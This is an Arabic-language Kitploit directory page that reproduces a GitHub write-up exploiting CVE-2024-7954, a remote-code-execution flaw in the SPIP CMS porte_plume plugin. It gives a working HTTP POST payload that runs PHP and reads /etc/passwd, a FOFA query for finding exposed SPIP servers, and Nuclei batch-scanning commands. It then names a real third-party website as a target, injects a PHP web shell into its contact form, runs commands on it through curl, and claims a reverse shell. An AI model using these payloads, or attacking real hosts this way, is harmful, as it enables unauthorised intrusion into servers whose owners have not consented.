Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Exploitation-of-a-Remote-Code-Execution-vulnerability--CVE-2024-7954- — استغلال ثغرة تنفيذ التعليمات البرمجية عن بُعد- (CVE-2024-7954) | Kitploit
أدوات/GitHubGitHub/shivanshkuntal/exploitation-of-a-remote-code-execution-vulnerability--cve-2024-7954-
الاستطلاعماسحات الثغرات الأمنية للويبتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالتعلم والتعليمالفريق الأحمر

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
تطوير الحمولات
مختبرات وتدريب عملي
GitHubshivanshkuntal/exploitation-of-a-remote-code-execution-vulnerability--cve-2024-7954-

Exploitation-of-a-Remote-Code-Execution-vulnerability--CVE-2024-7954-

استغلال ثغرة تنفيذ التعليمات البرمجية عن بُعد- (CVE-2024-7954)

عرض المستودع
1منذ 8 أشهرلم تتم المراجعة بعد
مشاركة

استغلال ثغرة تنفيذ الأوامر عن بُعد (CVE-2024-7954)

مشروع اختبار الثغرات البرمجية مقدم من: شيفانش كونتال


نظرة عامة

يوضح هذا المشروع استغلال ثغرة CVE-2024-7954، وهي ثغرة حرجة من نوع تنفيذ الأوامر عن بُعد (RCE) تؤثر على نظام إدارة المحتوى SPIP CMS من خلال إضافة porte_plume. تسمح الثغرة للمهاجمين غير المصادق عليهم بتنفيذ كود PHP عشوائي على الخادم المستهدف عبر طلبات HTTP POST مصممة خصيصًا.

تم إجراء الاختبار في بيئة محلية محكومة وتم توسيعه لاحقًا ليشمل الاستطلاع في العالم الحقيقي باستخدام FOFA و Nuclei.


1. إعداد البيئة

تم نشر إصدار ضعيف من SPIP CMS، تم التأكد من تأثره بـ CVE-2024-7954، محليًا على خادم Apache باستخدام مستودع GitHub يستضيف إصدارات معروفة بأنها ضعيفة.

الأدوات المستخدمة

  • Burp Suite (اعتراض وتعديل طلبات HTTP)
  • خادم Apache
  • محرك بحث FOFA
  • ماسح الثغرات Nuclei
  • curl (استغلال عبر سطر الأوامر)

أثبتت الصفحة الرئيسية لـ SPIP التي تعمل على localhost نجاح التثبيت وكانت بمثابة الهدف للاستغلال.


2. وصف الثغرة

إضافة porte_plume (قبل الإصدارات 4.30-alpha2 و 4.2.13 و 4.1.16) معرضة للثغرة بسبب عدم كفاية تعقيم المدخلات المقدمة من المستخدم. يمكن للمهاجمين حقن كود PHP في حقول نموذج معينة يتم عرضها وتنفيذها لاحقًا بواسطة الخادم.

التأثير: تنفيذ الأوامر عن بُعد بدون مصادقة الخطورة: حرجة متجه الهجوم: الشبكة / HTTP POST


3. إثبات المفهوم (PoC)

طلب POST خبيث

root@kitploit:~
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{hostname}}
Content-Type: application/x-www-form-urlencoded

data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB

ملاحظات

  • يتم حقن كود PHP داخل محرك تنسيق الماركداون.
  • يتم تنفيذها كمستخدم SPIP على الخادم.
  • يتطلب الهجوم بدون مصادقة.

4. استطلاع FOFA

تم استخدام استعلام FOFA لتعداد تثبيتات SPIP العامة:

root@kitploit:~
app="SPIP"

أعاد FOFA نقاط بيانات متعددة:

  • رؤوس HTTP
  • العناوين
  • عناوين IP & الموقع الجغرافي
  • كومة تقنية الخادم

قيمة الاستطلاع

  1. تعداد الأهداف: تحديد خوادم SPIP CMS القابلة للوصول.
  2. بصمة الإصدار: تحديد ما إذا كانت إصدارات الإضافة الضعيفة نشطة.
  3. تحديد الأولويات: اختيار الأنظمة القابلة للاستغلال على الأرجح.
  4. التحقق من الاستغلال: التحقق من صحة نقاط النهاية باستخدام حمولات مضبوطة.
  5. الأتمتة: تصدير نتائج FOFA إلى ملف targets.txt للمسح الدفعي.

المضيف الحقيقي المحدد المناسب:

root@kitploit:~
http://www.comite-tricolore.org/

5. المسح الآلي باستخدام Nuclei

الغرض

نظرًا لأن الاستغلال اليدوي بطيء، تم استخدام Nuclei لأتمتة اكتشاف CVE-2024-7954 عبر مجموعة كبيرة من الأهداف.

الأمر (قالب مخصص)

root@kitploit:~
nuclei -l targets.txt -t CVE-2024-7954.yaml
  • -l targets.txt لتحميل نتائج FOFA
  • -t لتحميل قالب إثبات المفهوم المخصص

ملاحظة: القالب الأولي لم يُرجع أي تطابقات.

مسح CVE واسع

root@kitploit:~
nuclei -l targets.txt -t cves/

حدد هذا المسح هدفًا واحدًا مستجيبًا:

root@kitploit:~
http://www.comite-tricolore.org/

6. التحقق اليدوي والاستغلال

الخطوة 1 — فحص نقطة النهاية الضعيفة

زيارة:

root@kitploit:~
http://www.comite-tricolore.org/spip.php?page=contact

تم التأكيد:

  • حقول إدخال للاسم والبريد الإلكتروني والرسالة
  • معالج طلب POST مناسب لحقن الحمولة

الخطوة 2 — حقن حمولة PHP

باستخدام Burp Suite أو curl، تعديل معامل message:

الحمولة

root@kitploit:~
<?php system($_GET['cmd']); ?>

الخطوة 3 — تشغيل تنفيذ الأوامر

زيارة:

root@kitploit:~
http://www.comite-tricolore.org/spip.php?page=contact&cmd=id

أو باستخدام curl:

root@kitploit:~
curl "http://www.comite-tricolore.org/spip.php?page=contact&cmd=id"

أكد الإخراج تنفيذ الأوامر عن بُعد.

الخطوة 4 — الصدفة العكسية (الوصول النهائي)

تتيح حمولة مصممة استدعاء صدفة عكسية، مما يسمح بـ:

  • whoami
  • ls
  • وصول تفاعلي كامل للصدفة

7. ملاحظات حاسمة

  • الاستغلال بدون مصادقة يزيد بشكل كبير من الخطورة.
  • فشل تعقيم المدخلات في الإضافة هو المشكلة الأساسية.
  • بمجرد حقن PHP وعرضه، يمكن اختراق الخادم بالكامل.
  • الصدفة العكسية → تصعيد محتمل للامتيازات → السيطرة على الخادم.
  • الهجوم تافه لأتمتته باستخدام curl أو نصوص Python أو Nuclei.

8. الخاتمة

يوضح هذا المشروع سلسلة الاستغلال الكاملة لـ CVE-2024-7954، من الاستطلاع إلى الحصول على صدفة تفاعلية.

مسار الاستغلال

  1. الاستطلاع (FOFA)
  2. المسح الآلي (Nuclei)
  3. حقن الحمولة يدويًا
  4. التحقق من تنفيذ الأوامر
  5. الوصول عبر الصدفة العكسية

الدروس الأمنية

  • التحقق الصارم من المدخلات إلزامي لجميع البيانات التي يتحكم بها المستخدم.
  • يجب أن تتبع الإضافات ممارسات البرمجة الآمنة.
  • يجب على المؤسسات تطبيق التصحيحات الأمنية فورًا.
  • تقييمات الثغرات المنتظمة ضرورية لمنع هجمات RCE.

تسلط هذه الثغرة الضوء على كيف يمكن لإضافة تنسيق نصوص تبدو غير ضارة أن تخلق اختراقًا كاملاً للنظام عندما لا تكون مؤمنة بشكل صحيح.

تنزيل الأداة